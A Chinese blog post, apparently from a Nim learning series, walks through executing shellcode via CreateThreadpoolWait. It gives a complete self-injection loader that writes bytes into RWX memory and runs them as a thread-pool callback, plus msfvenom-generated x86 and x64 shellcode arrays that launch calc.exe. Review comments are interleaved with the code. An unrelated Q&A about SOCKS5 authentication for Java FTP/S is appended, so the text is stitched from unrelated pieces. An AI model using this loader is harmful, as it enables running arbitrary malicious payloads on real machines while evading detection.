通过CreateThreadpoolWait执行shellcode(nim学习系列)

Posted 学习委员*尼姆大人



首先通过CreateEvent函数创建一个signaled的事件对象,也就是第三个参数必须为TRUE。否则shellcode将不会得到执行,且进程将一直等待下去。

使用CreateThreadpoolWait函数创建一个线程池等待回调,我们只需要关心第一个参数也就是等待完成或者超时后要执行的回调函数,这里我们将该回调函数设置为shellcode。

使用SetThreadpoolWait函数将等待对象和第一步创建的句柄绑定,一个等待对象一次只能等待一个句柄。当该句柄变成signaled或超时后,会执行等待对象的回调函数。

使用WaitForSingleObject对第一步的事件对象进行等待。由于我们的事件对象本身就是signaled的,所以设置的回调函数会立马得到执行。如此就执行了shellcode。
import winim
import winim/lean

proc myThread[I, T](shellcode: array[I, T]): void =
    ## Copies `shellcode` into a freshly allocated RWX region of the *current*
    ## process and hands that address to the thread pool as a wait callback.
    ##
    ## `I`/`T` are the array index and element types; the listing below calls
    ## it with `array[N, byte]`, and the byte count written is `shellcode.len`.
    ##
    ## Despite the cross-process API names (OpenProcess / VirtualAllocEx /
    ## WriteProcessMemory), the handle is opened on our own PID, so this is
    ## self-injection, not injection into another process.
    ##
    ## Review notes on the listing as published (left unchanged here):
    ## - no return value is checked: `rPtr`, `wSuccess`, `event` and
    ##   `threadPoolWait` are never compared against NULL/FALSE, so any API
    ##   failure ends with a callback registered on an invalid address;
    ## - `wSuccess` and `bytesWritten` are written but never read;
    ## - `pHandle`, `event` and `threadPoolWait` are never released (there is
    ##   no CloseHandle / CloseThreadpoolWait anywhere in the proc).
    let tProcess = GetCurrentProcessId()
    echo "Current Process ID: ", tProcess
    # PROCESS_ALL_ACCESS on our own process; the "Ex" APIs below therefore
    # operate locally.
    var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
    
    # One committed region, sized to the payload, readable+writable+executable
    # at once (PAGE_EXECUTE_READ_WRITE). Private RWX memory is commonly the
    # first artefact memory scanners and behavioural rules flag.
    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    # Copy the payload bytes into the new region; `unsafeAddr shellcode`
    # points at the first element of the array.
    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )
    # Reinterpret the region's base address as a thread-pool wait callback.
    let shellcodeAddress = cast[PTP_WAIT_CALLBACK](rPtr) 
    # Auto-reset event (2nd arg FALSE) created already signaled (3rd arg TRUE),
    # so a wait registered on it is satisfied immediately.
    var event: HANDLE = CreateEvent(NULL, FALSE, TRUE, NULL)
    # The C-style `(PTP_WAIT_CALLBACK)` prefix is a C idiom carried over; the
    # value already has that type after the cast above.
    var threadPoolWait: PTP_WAIT = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL)
    # Bind the wait object to the event, with no timeout (NULL).
    SetThreadpoolWait(threadPoolWait, event, NULL)
    # NOTE(review): both the thread-pool wait and this call wait on the same
    # auto-reset event; which of the two consumes its single signal is not
    # obvious from here — confirm the intended ordering before relying on it.
    WaitForSingleObject(event, INFINITE)

when defined(windows):
    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
    # Compile-time selection of a payload matching the target architecture.
    # Everything inside this `when` — including the `echo` calls — runs at
    # module load; on a non-Windows build nothing here is compiled in and
    # `myThread` is never invoked.
    when defined(i386):
        # msfvenom -p windows/exec CMD=calc.exe -f csharp, then modified for Nim arrays
        # The declared length (193) must equal the literal's element count or the
        # build fails. Bytes are reproduced as published and not re-verified here.
        echo "[*] Running in x86 process"
        var shellcode: array[193, byte] = [byte 0xfc,0xe8,0x82,0x00,0x00,0x00,
        0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,
        0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,
        0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,
        0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,
        0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,
        0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
        0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,
        0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,
        0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,
        0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,
        0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
        0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,
        0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,
        0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,
        0x6c,0x63,0x2e,0x65,0x78,0x65,0x00]


    elif defined(amd64):
        # msfvenom -p windows/x64/exec CMD=calc.exe -f csharp, then modified for Nim arrays
        # Same contract as the x86 branch: declared length (276) must match the
        # literal. Bytes are reproduced as published and not re-verified here.
        echo "[*] Running in x64 process"
        var shellcode: array[276, byte] = [byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,
        0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
        0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
        0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
        0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
        0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
        0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
        0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
        0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
        0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
        0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
        0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
        0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
        0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
        0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
        0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
        0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
        0x63,0x2e,0x65,0x78,0x65,0x00]     

    # This is essentially the equivalent of 'if __name__ == "__main__"' in python
    when isMainModule:
        # Runs the architecture-specific payload inside this same process; see
        # the review notes on `myThread` for the unchecked results and leaked handles.
        myThread(shellcode)

From: https://www.cnblogs.com/StudyCat/p/17410246.html

连接到 SOCKS5 代理以在 Java 中执行 FTP/S

【中文标题】连接到 SOCKS5 代理以在 Java 中执行 FTP/S【英文标题】:Connecting to a SOCKS5 proxy to do FTP/S in Java 【发布时间】:2010-10-20 21:55:51 【问题描述】:

我正在编写一个作业,它将通过我的 SOCKS5 代理连接到客户端的 FTP/S 服务器,并且我正在使用 Apache Commons Net 包。问题是我的 SOCKS 代理配置为不需要身份验证,但我仍然收到以下异常:

java.net.SocketException: SOCKS : authentication failed
    at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:443)
    at java.net.Socket.connect(Socket.java:519)

我尝试将 java.net.socks.username 和 password 属性设置为空字符串,但仍然收到同样的异常。有没有办法告诉代码不使用身份验证?深入研究底层源码后,我几乎认为它是在向代理服务器查询身份验证要求,但我不确定。

【问题讨论】:

【参考方案1】:

好的,所以问题是我的 SOCKS 代理确实被配置为要求身份验证,只是同时也接受未经身份验证的连接。我们使用 Dante;像 Filezilla 这样的程序足够聪明,会遍历所有可接受的身份验证方法,但 java.net 包似乎只使用代理提供的第一种方法。由于我的 sockd.conf 文件中的身份验证配置如下:

method: username none
user.notprivileged: nobody

java.net 便要求提供用户名和密码。我只是把 method 的顺序翻转为 “none username”,Filezilla 和 java.net 就都能正确地通过代理了。这更像是一个运维层面的解决方案,但不管怎样代码能工作了,对吧?

【讨论】:

感谢您抽出宝贵时间回答您自己的问题。我遇到了完全相同的问题,这就是解决方案:D 非常感谢。自己永远不会想到这一点。
